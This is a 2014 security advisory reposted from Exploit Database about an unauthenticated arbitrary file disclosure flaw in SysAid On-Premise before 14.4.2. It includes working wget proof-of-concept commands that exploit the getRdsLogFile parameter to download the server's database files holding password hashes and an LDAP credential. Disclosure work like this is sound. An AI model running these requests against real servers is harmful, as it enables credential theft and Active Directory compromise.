SysAid Server – Arbitrary File Disclosure

• Exploit Database
• 21 阅读

• 作者： Bernhard Mueller
  日期： 2014-12-23
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35593/

• Vantage Point Security Advisory 2014-004
  ========================================
  
  Title: SysAid Server Arbitrary File Disclosure
  ID: VP-2014-004
  Vendor: SysAid
  Affected Product: SysAid On-Premise
  Affected Versions: < 14.4.2
  Product Website: http://www.sysaid.com/product/sysaid
  Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>
  
  
  Summary:
  ---
  SysAid Server is vulnerable to an unauthenticated file disclosure
  attack that allows an anonymous attacker to read arbitrary files on
  the system. An attacker exploiting this issue can compromise SysAid
  user accounts and gain access to important system files. When SysAid
  is configured to use LDAP authentication it is possible to gain read
  access to the entire Active Directory or obtain domain admin
  privileges.
  
  Details:
  ---
  
  How to download SysAid server database files containing usernames and
  password hashes (use any unauthenticated session ID):
  
  wget -O "ilient.mdf" --header="Cookie:
  JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
  "http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"
  
  wget -O "ilient.ldf" --header="Cookie:
  JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
  "http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"
  
  
  The dowloaded MSSQL files contain the LDAP user account and encrypted
  password used to access the Active Directory (SysAid encrypts the
  password with a static key that is the same for all instances of the
  software).
  
  
  Fix Information:
  ---
  
  Upgrade to version 14.4.2.
  
  
  Timeline:
  ---
  
  2014/11/14: Issue reported
  2014/12/22: Patch available and installed by client
  
  About Vantage Point Security:
  ---
  
  Vantage Point Security is the leading provider for penetration testing
  and security advisory services in Singapore. Clients in the Financial,
  Banking and Telecommunications industriesselect Vantage Point
  Security based on technical competency and a proven track record to
  deliver significant and measurable improvements in their security
  posture.
  
  Web: https://www.vantagepoint.sg/
  Contact: office[at]vantagepoint[dot]sg